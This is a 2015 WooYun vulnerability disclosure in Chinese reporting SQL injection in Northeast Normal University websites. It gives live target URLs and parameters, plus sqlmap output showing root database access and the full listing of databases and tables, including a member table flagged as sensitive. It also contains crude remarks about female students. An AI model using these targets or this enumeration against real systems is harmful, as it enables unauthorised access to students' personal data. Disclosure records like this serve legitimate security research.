当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122819

漏洞标题:东北师范大学SQL注入漏洞

相关厂商:东北师范大学

漏洞作者: 色豹

提交时间:2015-06-26 11:20

修复时间:2015-07-01 11:22

公开时间:2015-07-01 11:22

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

大学生毕业季,师范大学妹子多多,不看不知道,一看吓一跳。

详细说明:

漏洞地址:

http://subsite.nenu.edu.cn/qnn/questionnaire.php?cs=8295


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA: True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'


root 权限

web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [6]:
[*] gallery
[*] geyx
[*] information_schema
[*] mysql
[*] nenunew
[*] wurfl


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: nenunew
[64 tables]
+----------------------+
| E$_nenu_urp |
| SNP_CHECK_TAB |
| adminuser |
| columny |
| daily_scorea |
| daily_scoreb |
| liiuy |
| nenu_academic |
| nenu_addon22 |
| nenu_addon23 |
| nenu_addonacademic |
| nenu_addonbasic |
| nenu_addonlaw |
| nenu_addonlinks |
| nenu_addonnews |
| nenu_addonnotice |
| nenu_addonxwgk |
| nenu_admin |
| nenu_admintype |
| nenu_arcatt |
| nenu_archives |
| nenu_archives22 |
| nenu_archives23 |
| nenu_arcrank |
| nenu_arctype |
| nenu_basic |
| nenu_cache_tagindex |
| nenu_calendary |
| nenu_channeltype |
| nenu_full_search |
| nenu_guest |
| nenu_homepageset |
| nenu_ip |
| nenu_keywords |
| nenu_law |
| nenu_links |
| nenu_log |
| nenu_member |
| nenu_news |
| nenu_notice |
| nenu_qanswer |
| nenu_qcommit |
| nenu_qquestion |
| nenu_qresponese |
| nenu_qsurvey |
| nenu_search_cache |
| nenu_search_keywords |
| nenu_search_rule |
| nenu_smalltypes |
| nenu_sysconfig |
| nenu_syspassport |
| nenu_tag_index |
| nenu_tag_list |
| nenu_uploads |
| nenu_urp |
| nenu_xwgk |
| newnotice |
| pro_score |
| professor_en |
| professorinfo |
| rate |
| rizhi |
| staff |
| yut |
+----------------------+


nenu_member表还存在敏感信息
http://kyc.nenu.edu.cn/res_ex_s.asp?nclass=15
这个分站也存在SQL注入

漏洞证明:

漏洞地址:

http://subsite.nenu.edu.cn/qnn/questionnaire.php?cs=8295


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA: True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user: 'root@localhost'


root 权限

web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
available databases [6]:
[*] gallery
[*] geyx
[*] information_schema
[*] mysql
[*] nenunew
[*] wurfl


web application technology: Apache 2.2.21, PHP 5.2.17
back-end DBMS: MySQL 5.0
Database: nenunew
[64 tables]
+----------------------+
| E$_nenu_urp |
| SNP_CHECK_TAB |
| adminuser |
| columny |
| daily_scorea |
| daily_scoreb |
| liiuy |
| nenu_academic |
| nenu_addon22 |
| nenu_addon23 |
| nenu_addonacademic |
| nenu_addonbasic |
| nenu_addonlaw |
| nenu_addonlinks |
| nenu_addonnews |
| nenu_addonnotice |
| nenu_addonxwgk |
| nenu_admin |
| nenu_admintype |
| nenu_arcatt |
| nenu_archives |
| nenu_archives22 |
| nenu_archives23 |
| nenu_arcrank |
| nenu_arctype |
| nenu_basic |
| nenu_cache_tagindex |
| nenu_calendary |
| nenu_channeltype |
| nenu_full_search |
| nenu_guest |
| nenu_homepageset |
| nenu_ip |
| nenu_keywords |
| nenu_law |
| nenu_links |
| nenu_log |
| nenu_member |
| nenu_news |
| nenu_notice |
| nenu_qanswer |
| nenu_qcommit |
| nenu_qquestion |
| nenu_qresponese |
| nenu_qsurvey |
| nenu_search_cache |
| nenu_search_keywords |
| nenu_search_rule |
| nenu_smalltypes |
| nenu_sysconfig |
| nenu_syspassport |
| nenu_tag_index |
| nenu_tag_list |
| nenu_uploads |
| nenu_urp |
| nenu_xwgk |
| newnotice |
| pro_score |
| professor_en |
| professorinfo |
| rate |
| rizhi |
| staff |
| yut |
+----------------------+


nenu_member表还存在敏感信息

修复方案:

SQL 过滤
保护好未来教师们的信息哦~(特别是美女教师!!)

版权声明:转载请注明来源 色豹@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-01 11:22

厂商回复:

最新状态:

暂无


漏洞评价:

评论